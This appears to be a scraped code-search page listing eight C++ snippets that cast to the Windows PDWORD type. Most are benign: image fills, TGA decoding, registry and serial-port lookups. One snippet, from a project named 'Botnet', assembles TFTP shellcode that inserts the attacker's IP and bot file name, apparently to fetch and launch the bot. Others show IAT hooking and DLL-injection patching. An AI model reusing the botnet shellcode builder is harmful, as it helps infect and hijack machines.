C++ (Cpp) PDWORD示例

示例#1

文件： CHook.cpp 项目： jmfti/Function-hooks-in-cplusplus

DWORD* CIATHook::IATHook( /*HMODULE hDllWhichImports,*/ char *DllImportsFrom, char *OldFunctionName ){
	if (!this->loaded) return 0;
	DWORD dwIndex;
    DWORD dwOffset;
    HMODULE hDllWhichImports = this->moduleimporting;
    PIMAGE_DATA_DIRECTORY pDataDirectory;
    PIMAGE_DOS_HEADER pDosHeader;
    PDWORD pdwIAT;
    PDWORD pdwINT;
    PIMAGE_IMPORT_DESCRIPTOR pImportDescriptor;
    PIMAGE_IMPORT_BY_NAME pImportName;
    PIMAGE_OPTIONAL_HEADER pOptionalHeader;
    PIMAGE_NT_HEADERS pPeHeader;
    PSTR strCurrent;
    //hDllWhichImports = GetModuleHandleA(DllWhichImports);

    if(!hDllWhichImports) return NULL;
          
    pDosHeader = PIMAGE_DOS_HEADER(hDllWhichImports);
    dwOffset = pDosHeader->e_lfanew;
    pPeHeader = PIMAGE_NT_HEADERS(long(hDllWhichImports) + dwOffset);
    pOptionalHeader = &pPeHeader->OptionalHeader;
    pDataDirectory = pOptionalHeader->DataDirectory;
    dwOffset = pDataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress;
    pImportDescriptor = PIMAGE_IMPORT_DESCRIPTOR(long(hDllWhichImports) + dwOffset);
    for(dwIndex = 0; true; dwIndex++)
    {
        dwOffset = pImportDescriptor[dwIndex].Name;
        if (!dwOffset) return NULL;
        strCurrent = PSTR(long(hDllWhichImports) + dwOffset);

		if(_stricmp( strCurrent, DllImportsFrom) == 0 )
		{
			break;
		}
    }
    dwOffset = pImportDescriptor[dwIndex].FirstThunk;
    pdwIAT = PDWORD(long(hDllWhichImports) + dwOffset);
    dwOffset = pImportDescriptor[dwIndex].OriginalFirstThunk;
    pdwINT = PDWORD(long(hDllWhichImports) + dwOffset);

	for(dwIndex = 0; true; dwIndex++)
    {
        dwOffset = pdwINT[dwIndex];
        if (!dwOffset) return NULL;
        pImportName = PIMAGE_IMPORT_BY_NAME(long(hDllWhichImports) + dwOffset);
        strCurrent = PSTR(pImportName->Name);

		if(_stricmp(strCurrent, OldFunctionName) == 0)
        {
            return &pdwIAT[dwIndex];
        }
    }
    return NULL;
}

示例#2

文件： shellcode.cpp 项目： A-Massarella/Botnet

DWORD GetShellcode(char *buffer, DWORD buffersize, char *ownip, char *botfilename)
{
	DWORD ShellcodeSize = GetShellcodeSize(ownip, botfilename);
	if (ShellcodeSize > buffersize) return 0;

	DWORD IPLength = strlen(ownip);
	DWORD BotFileNameLength = strlen(botfilename);

	DWORD *CallOver1 = PDWORD(tftp_Shellcode+0x64);
	*CallOver1 = (IPLength + BotFileNameLength + 0x12);

	DWORD *CallOver2 = PDWORD(tftp_Shellcode+0x85);
	*CallOver2 = (BotFileNameLength + 1);

	DWORD *CallCreateProcess1 = PDWORD(tftp_Shellcode+0x7D);
	*CallCreateProcess1 = (BotFileNameLength + 1 + 0x16);

	DWORD *JzExecuteBotfileLoop = PDWORD(tftp_Shellcode+0x93);
	*JzExecuteBotfileLoop = (0xFFFFFFED - BotFileNameLength);

	DWORD i = 0;

	memcpy(buffer+i, tftp_Shellcode,            0x74); i += 0x74;
	memcpy(buffer+i, ownip,                 IPLength); i += IPLength;
	memcpy(buffer+i, tftp_Shellcode+0x74,       0x05); i += 0x05;
	memcpy(buffer+i, botfilename,  BotFileNameLength); i += BotFileNameLength;
	memcpy(buffer+i, tftp_Shellcode+0x79,       0x10); i += 0x10;
	memcpy(buffer+i, botfilename,  BotFileNameLength); i += BotFileNameLength; 
	memcpy(buffer+i, tftp_Shellcode+0x89,       0x38); i += 0x38;

	return ShellcodeSize;
}

示例#3

文件： qserialportinfo_win.cpp 项目： Sagaragrawal/2gisqt5android

static QString devicePortName(HDEVINFO deviceInfoSet, PSP_DEVINFO_DATA deviceInfoData)
{
    const HKEY key = ::SetupDiOpenDevRegKey(deviceInfoSet, deviceInfoData, DICS_FLAG_GLOBAL,
                                            0, DIREG_DEV, KEY_READ);
    if (key == INVALID_HANDLE_VALUE)
        return QString();

    static const QStringList portNameRegistryKeyList = QStringList()
            << QStringLiteral("PortName")
            << QStringLiteral("PortNumber");

    QString portName;
    foreach (const QString &portNameKey, portNameRegistryKeyList) {
        DWORD bytesRequired = 0;
        DWORD dataType = 0;
        QByteArray outputBuffer;
        forever {
            const LONG ret = ::RegQueryValueEx(key, reinterpret_cast<const wchar_t *>(portNameKey.utf16()), Q_NULLPTR, &dataType,
                                               reinterpret_cast<unsigned char *>(outputBuffer.data()), &bytesRequired);
            if (ret == ERROR_MORE_DATA) {
                outputBuffer.resize(bytesRequired);
                continue;
            } else if (ret == ERROR_SUCCESS) {
                if (dataType == REG_SZ)
                    portName = toStringAndTrimNullCharacter(outputBuffer);
                else if (dataType == REG_DWORD)
                    portName = QStringLiteral("COM%1").arg(*(PDWORD(outputBuffer.constData())));
            }
            break;
        }

        if (!portName.isEmpty())
            break;
    }

示例#4

文件： IATHookInjector.cpp 项目： dennisfischer/dll-injector

BOOL IATHookInjector::PatchDWORD(BYTE* pBuffer, DWORD dwBufferSize, DWORD dwOldValue, DWORD dwNewValue) const
{
	for (auto i = 0; i < int(dwBufferSize - 4); i++)
	{
		if (*PDWORD(pBuffer + i) == dwOldValue)
		{
			memcpy(pBuffer + i, &dwNewValue, 4);

			return TRUE;
		}
	}

	return FALSE;
}

示例#5

文件： ieFill.cpp 项目： FMJ-Software/ieCpp

void ie_FillLine(iePfL pDst, DWORD nXW, iefL clr)
{
#ifndef __X64__
	if (g_bSSE2 && (nXW >= 8)) {
#else
	if (nXW >= 8) {
#endif
		// Do fill using SSE2!

		while (nXW) {												// Fill until destination is aligned
			if (_mm_isAligned(pDst)) break;
			*pDst++ = clr;
			nXW--;
		}

		__m128i r0 = _mm_set1_epi32(*PDWORD(&clr));

		for (DWORD nXW_4 = nXW >> 2; nXW_4--;) {
			_mm_store_si128((__m128i *)pDst, r0);
			pDst += 4;
		}

		if (nXW & 2) {
			_mm_storel_epi64((__m128i *)pDst, r0);
			pDst += 2;
		}

		if (nXW & 1) {
			*PDWORD(pDst) = _mm_cvtsi128_si32(r0);
		}

		return;
	}

	while (nXW--)
		*pDst++ = clr;
}

示例#6

文件： Basic.cpp 项目： Zekom/tracetool

// Check partner 
void Basic::OnBnClickedPartner()
{
    HKEY hKey;
    char buffer[100];
    wchar_t key[100] ;
    DWORD Partner_id ;
    DWORD dwBufLen=100;
    LONG lRet;

    WSADATA wsaData;
    int err = WSAStartup( MAKEWORD(1,1), &wsaData );

    wsprintf (key, L"Software\\Microsoft\\Windows CE Services\\Partners") ;
    lRet = RegOpenKeyEx( HKEY_LOCAL_MACHINE, key, 0, KEY_QUERY_VALUE, &hKey );
    if( lRet != ERROR_SUCCESS )
        return ;

    // get the PCur value
    dwBufLen = 100 ;
    lRet = RegQueryValueEx( hKey, L"PCur", /*Reserved*/ NULL, /*rights*/ NULL, (LPBYTE)buffer, &dwBufLen);

    RegCloseKey( hKey );

    if( (lRet != ERROR_SUCCESS) || (dwBufLen > 100) )
        return ;

    Partner_id = * PDWORD (buffer) ;

    // open key for the current partner
    wsprintf (key, L"Software\\Microsoft\\Windows CE Services\\Partners\\P%d", Partner_id) ;
    lRet = RegOpenKeyEx( HKEY_LOCAL_MACHINE, key, 0, KEY_QUERY_VALUE, &hKey );
    if( lRet != ERROR_SUCCESS )
        return ;

    // get the PName value
    dwBufLen = 100 ;
    lRet = RegQueryValueEx( hKey, L"PName", /*Reserved*/ NULL, /*rights*/ NULL, (LPBYTE)buffer, &dwBufLen);

    RegCloseKey( hKey );

    //MessageBox (LPCWSTR (buffer), L"Active Sync Partner name") ;

    // it's your computer name used for synchronisation. The Resolved adress is the computer IP
    CheckHost ((wchar_t *) (buffer)) ; 
    WSACleanup();
}

示例#7

文件： ieFill.cpp 项目： FMJ-Software/ieCpp

void ie_FillLine(iePL pDst, DWORD nXW, ieL clr)
{
#ifndef __X64__
	if (g_bSSE2 && (nXW >= 32)) {
#else
	if (nXW >= 32) {
#endif
		// Do fill using SSE2!

		while (nXW) {												// Fill until destination is aligned
			if (_mm_isAligned(pDst)) break;
			*pDst++ = clr;
			nXW--;
		}

		__m128i r0 = _mm_set1_epi8(clr);

		for (DWORD nXW_16 = nXW >> 4; nXW_16--;) {
			_mm_store_si128((__m128i *)pDst, r0);
			pDst += 16;
		}

		if (nXW & 8) {
			_mm_storel_epi64((__m128i *)pDst, r0);
			pDst += 8;
		}

		if (nXW & 4) {
			*PDWORD(pDst) = _mm_cvtsi128_si32(r0);
			pDst += 4;
		}

		nXW &= 3;
	}

	while (nXW--)
		*pDst++ = clr;
}

示例#8

文件： ief_tga.cpp 项目： FMJ-Software/ieCpp

static void tga_RLE(PBYTE pbDst, PCBYTE pbSrc, DWORD dwImgSize, int iPiWidth)	// Decode TARGA RLE...
// Targa RLE decompression
{
	//  b := Read byte;
	//  if b7 = 1 then duplicate next pixel (1 + b & 0x7F) times
	//  else copy (1 + b & 0x7F) pixels literary

	PBYTE	pbEnd = pbDst + dwImgSize*iPiWidth;

	if (iPiWidth == 4) {

		while (pbDst < pbEnd) {

			BYTE b = *pbSrc++;
			DWORD c = 1 + (b & 0x7F);

			if (b & 0x80) {
				DWORD dw = *PDWORD(pbSrc);	pbSrc += 4;
				for (; c--; pbDst += 4)
					*PDWORD(pbDst) = dw;
			} else {
				DWORD cb = 4*c;
				memcpy(pbDst, pbSrc, cb);
				pbDst += cb;
				pbSrc += cb;
			}
		} 

	} else if (iPiWidth == 3) {

		while (pbDst < pbEnd) {

			BYTE b = *pbSrc++;
			DWORD c = 1 + (b & 0x7F);

			if (b & 0x80) {
				DWORD dw = *PDWORD(pbSrc);	pbSrc += 3;
				for (; c--; pbDst += 3)
					*PDWORD(pbDst) = dw;
			} else {
				DWORD cb = 3 * c;
				memcpy(pbDst, pbSrc, cb);
				pbDst += cb;
				pbSrc += cb;
			}
		} 

	} else if (iPiWidth == 2) {

		while (pbDst < pbEnd) {

			BYTE b = *pbSrc++;
			DWORD c = 1 + (b & 0x7F);

			if (b & 0x80) {
				WORD w = *PWORD(pbSrc);	pbSrc += 2;
				for (; c--; pbDst += 2)
					*PWORD(pbDst) = w;
			} else {
				DWORD cb = 2 * c;
				memcpy(pbDst, pbSrc, cb);
				pbDst += cb;
				pbSrc += cb;
			}
		} 

	} else { //if (iPiWidth == 1) {

		while (pbDst < pbEnd) {

			BYTE b = *pbSrc++;
			DWORD c = 1 + (b & 0x7F);

			if (b & 0x80) {
				BYTE b = *pbSrc++;
				for (; c--; )
					*pbDst++ = b;
			} else {
				memcpy(pbDst, pbSrc, c);
				pbDst += c;
				pbSrc += c;
			}
		} 
	}
}